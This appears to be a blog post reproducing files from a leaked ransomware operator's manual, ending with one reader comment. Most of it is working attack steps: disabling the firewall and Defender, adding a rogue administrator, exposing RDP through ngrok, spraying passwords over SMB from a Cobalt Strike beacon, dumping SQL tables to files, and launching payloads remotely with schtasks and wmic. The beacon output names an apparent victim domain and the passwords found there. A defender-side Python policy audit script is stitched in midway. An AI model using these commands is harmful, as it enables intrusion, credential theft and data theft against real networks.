shell NetSh Advfirewall set allprofiles state off

shell netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

shell netsh firewall set service type=remotedesktop mode=enable

We can add a separate user under ngrok:
shell net user Admin Password1 /add
shell net localgroup Administrators Admin /add

– Go to the ngrok account panel – check the tunnel (“Endpoints – Status”).
Copy IP: port from there and go to any RDP client. We connect (you can also use the account that we created).

File Name: RouterScan.txt

Software for Windows, allows you to brute-force routers, cameras, some NAS (depending on the type of authorization), if they have a web interface.
First, it tries to understand what kind of device it is, then applies suitable exploits to it (it breaks the MikroTik even if the firmware is below 6.12 per second and issues the password in plain form)
If there are no exploits for this model, then it starts to brute. If necessary, load the dictionaries into 3 text files starting with auth_***.txt, lying in the root of the program. In this form:
Login: Password
Login: Password
Only not through space indents, but through Tab
We pick up the sox on the cob, proxy it through ProxyFier, run it on our Windows, set the ranges or specific ip, the number of threads (5 is the most) and timeout (it is better to increase this value to 3000ms so as not to miss it). The default ports have already been specified, you can add your own if the web does not hang on the standard ones. In the Scanning Module, leave a check mark on the first (Router scan main) and HNAP 1.0, the rest are unlikely to be useful to you. We press start, wait and hope for the result

File Name: SMB AUTOBRUT.txt

SMB AUTOBRUT
The input data for carrying out this attack are only passwords.
– those dumped from the browser with SharpChrome
– those dumped by Seatbelt
– those dumped in the process of work inside the network (mimikatz, etc.)
And in general any others, for example, found recorded in files

If there are fewer such passwords than we can launch in a brute-force attack, we can safely supplement them from the following list of the most commonly encountered in the corporate environment.
Password1
Hello123
password
Welcome1
banco@1
training
Password123
job12345
spring
food1234


We also recommend using password lists based on the seasons and the current year. Considering that passwords are changed every three months, you can take a “reserve” to generate such a sheet.
For example, in August 2020, we create a list with the following content
June2020
July2020
August20
August2020
Summer20
Summer2020
June2020!
July2020!
August20!
August2020!
Summer20!
Summer2020!

All passwords above fall either into 3 out of 4 requirements for Active Directory passwords (which is enough for users to set them), or into all 4 requirements.
Approx. we consider the most popular version of the requirements.



Domain Admins Scenario
1. We collect the list of domain administrators with the command shell net group "domain admins" /dom
We write the received data to a file
admins.txt

2. We upload this file to the host in the C:\ProgramData folder

3. Request information on the domain account blocking policy (protection against brute force)

beacon> shell net accounts / dom

Tasked beacon to run: net accounts /dom
host called home, sent: 48 bytes
received output:


The request will be processed at a domain controller for domain shookconstruction.com.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 6
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: BACKUP

We are interested in the Lockout threshold parameter, which most often contains a certain numerical value that we must use later as a parameter (in this case, it is Never, which means that protection against password brute-forcing is disabled).
In this guide, in the future, we will indicate the value 5 as roughly the most common.
The Minimum password length parameter indicates the minimum allowed number of password characters required to filter our “list” of passwords that we will set.

powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1
psinject 4728 x86 Invoke-SMBAutoBrute -UserList “C:\ProgramData\admins.txt” -PasswordList “Password1, Welcome1, 1qazXDR%+” -LockoutThreshold 5 -ShowVerbose
– 4728 in this case is the current pid, and x86 is its bit depth
– The list of passwords consists of one which we had “found” and two from the list of popular passwords

6. We look at the progress of the script and see the result

Success! Username: Administrator. Password: 1qazXDR%+
Success! Username: CiscoDirSvcs. Password: 1qazXDR%+



We got two domain administrators out of the way.

=========================================================================

The scenario without specifying a list of users differs in only two things.
– psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5
We do not specify the UserList and ShowVerbose parameters. The absence of the first means that the search will be performed on ALL domain users, the absence of the second means that only SUCCESSFUL results will be displayed.
I will not wait in the video guide for the end of the script that will go through all user / password pairs in the domain, I will only show the output.

Success! Username: Administrator. Password: 1qazXDR%+
Success! Username: CiscoDirSvcs. Password: 1qazXDR%+
Success! Username: support. Password: 1qazXDR%+
Success! Username: accountingdept. Password: 1qazXDR%+



As you can see, we were able to find accounts of other users that may be useful for further promotion on the network and raising rights.

If there is no positive result, you can repeat it after a while (it is optimal to multiply the Lockout duration parameter by two before the next attempt) with a new list of passwords.
The end of the script will be marked by outputting a message to the beacon
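As an added defender-side example (not part of the leaked manual), the following parses the `net accounts /dom` output quoted above, flags the two settings the manual reads before a spray, and checks the quoted password lists against the default three-of-four complexity rule and against a banned-word filter; the domain name and the banned-word list are placeholders and assumptions.

```python
import re
from typing import Dict, List

# Constructed sample: the `net accounts /dom` output quoted in the manual, with
# the real domain name replaced by a placeholder.
NET_ACCOUNTS_OUTPUT = """\
The request will be processed at a domain controller for domain example.test.
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 6
Length of password history maintained: 24
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: BACKUP
"""

# The two candidate lists quoted in the manual, reused here only to test them
# against the parsed policy.
COMMON_LIST = ["Password1", "Hello123", "password", "Welcome1", "banco@1",
               "training", "Password123", "job12345", "spring", "food1234"]
SEASON_LIST = ["June2020", "July2020", "August20", "August2020", "Summer20", "Summer2020",
               "June2020!", "July2020!", "August20!", "August2020!", "Summer20!", "Summer2020!"]

# Assumption: the organisation maintains a banned-word list of this kind (as a
# password filter or cloud password protection would apply); this one is illustrative.
BANNED_WORDS = ["password", "welcome", "spring", "summer", "autumn", "fall", "winter",
                "january", "february", "march", "april", "may", "june", "july",
                "august", "september", "october", "november", "december"]
YEAR = re.compile(r"(19|20)\d\d")


def parse_net_accounts(text: str) -> Dict[str, str]:
    """Map each 'Setting: value' line to a dict; lines without a colon are skipped."""
    policy: Dict[str, str] = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            policy[key.strip()] = value.strip()
    return policy


def audit_policy(policy: Dict[str, str]) -> List[str]:
    """Flag the two settings the manual keys on: lockout threshold and minimum length."""
    findings = []
    threshold = policy.get("Lockout threshold", "Never")
    if threshold.lower() == "never":
        findings.append("Lockout threshold is Never: online guessing is unlimited")
    min_len = int(policy.get("Minimum password length", "0"))
    if min_len < 14:
        findings.append(f"Minimum password length {min_len} leaves room for season+year passwords")
    return findings


def category_count(pw: str) -> int:
    """Count the four character classes the manual refers to: upper, lower, digit, other."""
    return sum((any(c.isupper() for c in pw), any(c.islower() for c in pw),
                any(c.isdigit() for c in pw), any(not c.isalnum() for c in pw)))


def accepted_by_policy(pw: str, policy: Dict[str, str]) -> bool:
    """True if the default 'three of four classes' rule and the minimum length accept pw."""
    min_len = int(policy.get("Minimum password length", "0"))
    return len(pw) >= min_len and category_count(pw) >= 3


def blocked_by_banned_list(pw: str) -> bool:
    """True if a banned-word or year-pattern rule would reject pw regardless of complexity."""
    lowered = pw.lower()
    return any(word in lowered for word in BANNED_WORDS) or YEAR.search(pw) is not None


def accepted_guesses(candidates: List[str], policy: Dict[str, str]) -> List[str]:
    """Candidates the domain policy alone lets a user choose."""
    return [pw for pw in candidates if accepted_by_policy(pw, policy)]


def still_accepted_with_banned_list(candidates: List[str], policy: Dict[str, str]) -> List[str]:
    """Candidates that survive both the domain policy and the banned-word filter."""
    return [pw for pw in accepted_guesses(candidates, policy) if not blocked_by_banned_list(pw)]


if __name__ == "__main__":
    policy = parse_net_accounts(NET_ACCOUNTS_OUTPUT)
    for finding in audit_policy(policy):
        print("finding:", finding)
    print("policy accepts:", accepted_guesses(COMMON_LIST + SEASON_LIST, policy))
    print("banned list still lets through:",
          still_accepted_with_banned_list(COMMON_LIST + SEASON_LIST, policy))
```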

File Name: SQL DAMP.txt

0. see who works with the database (hosts and users from where they connected to)
shell sqlcmd -S localhost -Q "select loginame, hostname from sys.sysprocesses"

1. Output to kmd of all databases on the server
shell sqlcmd.exe -S localhost -E -Q "SELECT name FROM master.dbo.sysdatabases;"

with size in megabytes
shell sqlcmd -S localhost -E -Q "SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;"

2. Unloading the 100 most saturated by the number of rows of tables in the database, the number of rows and the size of tables on the hard drive
sqlcmd -S localhost -E -Q "USE %databasename% SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS Total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;"

3. Counting rows in a specific table of a specific database
sqlcmd -S localhost -E -Q "select count(*) from %databasename%.dbo.%tablename%;"

4. Dumping the first 10 records in a specific table of a specific database
sqlcmd -S localhost -E -Q "select top 10 * from %databasename%.dbo.%tablename%;"
sqlcmd -S localhost -E -Q "use %databasename%; select top 10 * from %tablename%" -W

5. Search by column names in a specific database using the example of% pass%
sqlcmd -S localhost -E -Q "select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from %databasename%.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';"
6. Unloading the contents of specific columns from a specific table into a txt file in a folder on the hard drive (in this example, filtered by the numerical value of the table > date)
sqlcmd.exe -S localhost -E -Q "select UserKey, EmailAddress, RealName, Phone, FirstName, LastName, CountryName, CreatedDate from %databasename%.dbo.%tablename% where CreatedDate > '2017-11-30';" -W -s "|" -o "C:\temp\123.txt"
FULL>
sqlcmd.exe -S localhost -E -Q "select * from %databasename%.dbo.%tablename%" -W -s "|" -o "C:\Windows\Temp\1.txt"

7. Displaying all tables of a specific database
shell sqlcmd -S localhost -E -Q "use %databasename%; exec sp_tables" -W

for a remote / other local server, change localhost to ip, port
as an option – localhost,% port% (see netstat)

If a table or database is named with 2-3-4 words, then it is escaped like this: [%databasename/tablename%]

sqlcmd -E -S localhost -Q "BACKUP DATABASE databasename TO DISK = 'd:\adw.bak'"

File Name: to disable the defender.txt

* to disable the defender – open gmer or alternatives –
kill the MsMpEng process \ with it you go to the file location,
delete the file itself = bravo, you are great

File Name: We replace the sorted finder.txt

You can run a payload or some kind of bat file using SCHTASKS
shell SCHTASKS /s ip\hostname /RU "SYSTEM" /create /tn "WindowsSensor15" /tr "cmd.exe /c C:\ProgramData\P32.exe" /sc ONCE /sd 01/01/1970 /st 00:00
shell SCHTASKS /s ip\hostname /run /TN "WindowsSensor15"
shell schtasks /S ip\hostname /TN "WindowsSensor15" /DELETE /F

launching a dll payload looks like this
shell wmic /node:172.16.0.36 process call create "rundll32.exe C:\ProgramData\p64.dll StartW"

shell wmic /node:10.28.0.3 process call create "C:\ProgramData\j1.exe"
Executing the payload EXE

File Name: Website creation batnikod.txt

http://tobbot.com/data/
Great for creating teams, with the subsequent creation of batch files

File Name: Working script for creating a VPS server for penetration testing from A to Z.txt

https://xss.is/threads/53632/ – maybe it will be useful
working script for creating a VPS server for penetration testing from A to Z

File Name: Workstation to work through the Tor network.txt

Further (for those who have not done it yet), I propose to transfer the entire workstation to work through the Tor network.

In order to do this, you will need to configure your OS and Whonix (this is the OS that creates a “secure tunnel in Tor” for you (you can read more about it) (in 90% it will be kali), so here is the instruction.

HowTo: Kali + WHONIX or "Anonymous pentest through TOR"

After this action, I had a problem – Tor over Tor, although I followed the instructions. So here is the solution that helped me: https://www.whonix.org/wiki/Other_Operating_Systems#Configure_Tor_Browser_Settings

There, expand to the same place where the Expand tab will drop you.

File Name: this is an armitage installation. put on top of Metasploit

cd /opt/
curl -# -o /tmp/armitage.tgz http://www.fastandeasyhacking.com/download/armitage150813.tgz
sudo tar -xvzf /tmp/armitage.tgz -C /opt
sudo ln -s /opt/armitage/armitage /usr/local/bin/armitage
sudo ln -s /opt/armitage/teamserver /usr/local/bin/teamserver
sudo sh -c "echo java -jar /opt/armitage/armitage.jar \$\* > /opt/armitage/armitage"
sudo perl -pi -e 's/armitage.jar/\/opt\/armitage\/armitage.jar/g' /opt/armitage/teamserver

Comments

  1. Impressive article. It was a good decision to block AnyDesk in our environment. But close attention must be paid to AD.